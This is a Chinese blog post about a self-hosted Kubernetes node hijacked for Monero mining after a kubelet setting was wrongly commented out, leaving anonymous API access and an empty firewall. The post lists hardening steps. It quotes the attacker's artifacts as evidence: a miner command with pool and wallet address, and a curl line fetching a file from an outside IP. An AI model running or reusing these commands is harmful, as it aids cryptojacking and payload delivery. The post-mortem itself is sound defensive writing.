[导读]近期遇到了一次我们自建Kubernetes集群中某台机器被入侵挖矿,后续也找到了原因,所幸只是用来挖矿…网络安全是个严肃的问题,它总是在不经意间出现,等你反应过来却已经迟了。希望各位读者看完后也有所启发,去检查及加固自己的集群。入侵现象检查到某台机器中出现了异常进程./.syst...
近期遇到了一次我们自建 Kubernetes 集群中某台机器被入侵挖矿,后续也找到了原因,所幸只是用来挖矿…网络安全是个严肃的问题,它总是在不经意间出现,等你反应过来却已经迟了。希望各位读者看完后也有所启发,去检查及加固自己的集群。入侵现象
检查到某台机器中出现了异常进程./.system -o pool.supportxmr.com:3333 --donate-level=1 --coin=monero -u 46EPFzvnX5GH61ejkPpNcRNm8kVjs8oHS9VwCkKRCrJX27XEW2y1NPLfSa54DGHxqnKfzDUVW1jzBfekk3hrCVCm
curl -s http://45.9.148.35/scan_threads.dat
简单来讲,就是我们的机器被用来挖矿了…问题出现后,我们第一时间关闭了docker,其实应该隔离下环境, 把挖矿程序dump下来,以便后续分析。具体原因排查
iptables为空
出现了异常进程,肯定是被入侵了,我首先看的是 iptables
。果不其然,机器上的 iptables 规则是空的,意味着这台机器在裸奔。kubelet裸奔
内部同事提出了有可能是 kubelet 被入侵的问题,检查过其他组件后,开始检查 kubelet 组件最后检查到 kubelet 日志中有异常:kubelet设置不当
确认入侵问题,kubelet 参数设置错误,允许直接访问 kubelet 的 api发现是 kubelet 的启动项中,该位置被注释掉:然后文件中禁止匿名访问的配置没有读取该项配置是由于我操作不当注释掉的由于是新增加的机器,当晚就发现了问题,整个集群是我在管理的,我跟随着一起排查,所以很快就找到了原因,当晚我就把其他机器中的配置项重新扫了一遍,假如它们的防火墙失效了,也会有类似的入侵情况发生,还好此次事件控制在1台机器中。改进方案
其实该问题理论上讲是可以避免的,是因为出现了多层漏洞才会被有心人扫到,我从外到内整理了一下可能改进的策略。- 机器防火墙设置,机器防火墙是整个系统最外层,即使机器的防火墙同步失败,也不能默认开放所有端口,而是应该全部关闭,等待管理员连接到tty终端上检查。
- 使用机器时,假如机器不是暴露给外部使用的,公网IP可有可无的时候,尽量不要有公网IP,我们的机器才上线1天就被扫描到了漏洞,可想而知,公网上是多么的危险
- 使用kubelet以及其他系统服务时,端口监听方面是不是该有所考量?能不能不监听
0.0.0.0
,而是只监听本机的内网IP。 - 使用kubelet以及其他程序,设计或是搭建系统时, 对于匿名访问时的权限控制, 我们需要考虑到假如端口匿名会出现什么问题,是否应该允许匿名访问,如果不允许匿名访问,那么怎么做一套鉴权系统?
- 系统管理员操作时,是否有一个比较规范化的流程,是不是该只使用脚本操作线上环境? 手动操作线上环境带来的问题并不好排查和定位。
我这里不是抛出疑问,只是想告诉大家,考虑系统设计时,有必要考虑下安全性。
总结
发生了入侵事件后,同事开玩笑说,还好没其他经济损失,要不我可能要回家了。作为集群的管理员,只有自己最清楚问题的严重程度。从本质上来讲,问题已经相当严重了。入侵者相当于拥有了机器上docker的完整控制权限。如果读者有读过我关于docker系列的内容,就对权限上了解清楚了。因为此次事件的发生,不只是我,还有SA的同学基本都被diao了一遍,心里还是有点难受的,希望大家能对网络安全问题有所重视,从加固防火墙开始,避免监听不必要的端口,这两项至少是最容易实现的。
本站声明: 本文章由作者或相关机构授权发布,目的在于传递更多信息,并不代表本站赞同其观点,本站亦不保证或承诺内容真实性等。需要转载请联系该专栏作者,如若文章内容侵犯您的权益,请及时联系本站删除。
原文:https://nigelpoulton.com/blog/f/demystifying-kubernetes-service-discoveryKubernetes服务发现是一个经常让我产生困惑的主题之一。本文分...
关键字:
uber
我们做了一个街头采访,调查路人眼中的程序员到底是怎样的?提到程序员,大家似乎都有刻板印象:总是格子衬衫牛仔裤双肩包打扮,总是埋头敲代码,加班是常态……谁说程序员呆板木讷,只会埋头敲一行行代码“天书”?他们正在用指尖造梦,...
关键字:
微软
uber
这一专业化证明了LTI在应用程序现代化方面的能力
印度孟买2021年10月6
关键字:
微软
uber
(全球TMT2021年10月7日讯)全球技术咨询和数字解决方案公司Larsen & Toubro Infotech获得Microsoft Azure高级专业化的Kubernetes,
关键字:
微软
uber
- 前言 -几个星期前,Kubernetes开发团队宣布,他们正在弃用docker。这则新闻通过科技界和社交网络广为流传。Kubernetes群集是否会中断,如果是,我们将如何运行我们的应用程序?我们现在该怎么办?...
关键字:
uber
ck
编译|核子可乐、燕珊Docker如今的体量与当初的潜在愿景相比实在太过渺小,本文将带你了解Docker“落得如此田地”的原因和真相的细节。Docker还活着。尽管它近两三年的境况并不理想,但它还在苦苦挣扎,试图找到自己的...
关键字:
uber
ck
Uber周一表示,即使本周末法院下令将其叫车服务强制停业,Uber仍将继续运营可以创收的食品配送业务Uber Eats。
公司发言人说,Uber的食品配送部门似乎没有受到加利福尼亚州检察长提起的诉讼以
关键字:
加州
配送服务
uber
宁可不干了,也绝不屈服。Uber和Lyft两大共享出行巨头今天正式宣布,将从明天凌晨开始,在总部所在地加州无限期停业,以一种“停工抗议”的姿态,拒不服从加州政府的新劳动法。“这不是我们想要的结果。我们
关键字:
加州
共享经济
uber
lyft
停业抗议
Uber 周一表示,即使本周末法院下令将其叫车服务强制停业,Uber 仍将继续运营可以创收的食品配送业务 Uber Eats。公司发言人说,Uber 的食品配送部门似乎没有受到加利福尼亚州检察长提起的
关键字:
uber
宁可不干了,也绝不屈服。Uber 和 Lyft 两大共享出行巨头今天正式宣布,将从明天凌晨开始,在总部所在地加州无限期停业,以一种 “停工抗议”的姿态,拒不服从加州政府的新劳动法。“这不是我们想要的结
关键字:
uber
本周四,Uber前首席安全官约瑟夫·沙利文(Joseph Sullivan)受到刑事指控,罪名是试图隐瞒2016年的一次黑客攻击。当时的攻击导致Uber大约5700万用户和司机的个人信息泄露。值得注意
关键字:
美司法部
黑客
uber
加州出台的新劳动法或致 Uber 在该州的共享乘车业务发生重大变化。该公司称,最近正在考虑将品牌授权给独立经营的特许商户。这项措施可以拉开 Uber 和其平台司机之间的关系,也可作为将司机归类为公司员
关键字:
uber
Uber首席执行官达拉·科斯罗萨西(Dara Khosrowshahi)周三接受采访时表示,如果法院不推翻最近颁布的将司机归类为全职员工的裁决,Uber可能会暂时停业几个月。
科斯罗萨西说:“如果法院
关键字:
uber
加州
司机
Uber CEO 达拉 · 科斯罗萨西(Dara Khosrowshahi)今日表示,如果法院不推翻最近 “要求 Uber 将司机归类为全职员工”的裁决,该公司在加州的服务可能会暂时关闭几个月时间。本
关键字:
uber
物联网技术伴随着科技的迅速发展已经不再是一个新鲜名词,但是它却正在悄然无声的改变着我们的生活。智能家居的推广,智慧城市的建设无一不体现着它的应用。
如果说4年前,时任总理温家宝在
关键字:
uber
自动驾驶
通用汽车
8月1日,今日多家外媒报道称,滴滴出行将与中国优步(UberChina)合并,合并后,Uber将取得新公司20%的股权,新公司估值达350亿美元。另据《华尔街日报》援引消息人士的报道称,滴滴
关键字:
uber
北京时间8月7日凌晨消息,美国打车服务公司Uber今日发布了2020财年第二季度财报。报告显示,在截至6月30日的这一季度,Uber的营收为22.41亿美元,与去年同期的31.66亿美元相比下降29%
关键字:
uber
uber财报
二季度
Uber周四宣布,将收购自动驾驶卡车创业公司Otto。这将使Uber无人驾驶业务的发展更趋多元化,并有可能加强这一业务的盈利能力。
Otto联合创始人之一是谷歌前工程师安东尼&m
关键字:
uber
无人驾驶
北京时间8月19日消息,沃尔沃汽车与Uber今日达成战略协议,将联合开发下一代自动驾驶汽车与技术,而两家公司将为该项目投入共计3亿美元。
报道称,沃尔沃与Uber将启动
关键字:
uber
沃尔沃
自动驾驶
无人驾驶承担得不仅是出行方式的变革,更是城市复兴的希望。无人驾驶承担得不仅是出行方式的变革,更是城市复兴的希望。
北京时间9月11日消息,全世界都在观察,匹兹堡有30.6万人,Uber的测试是
关键字:
uber
无人驾驶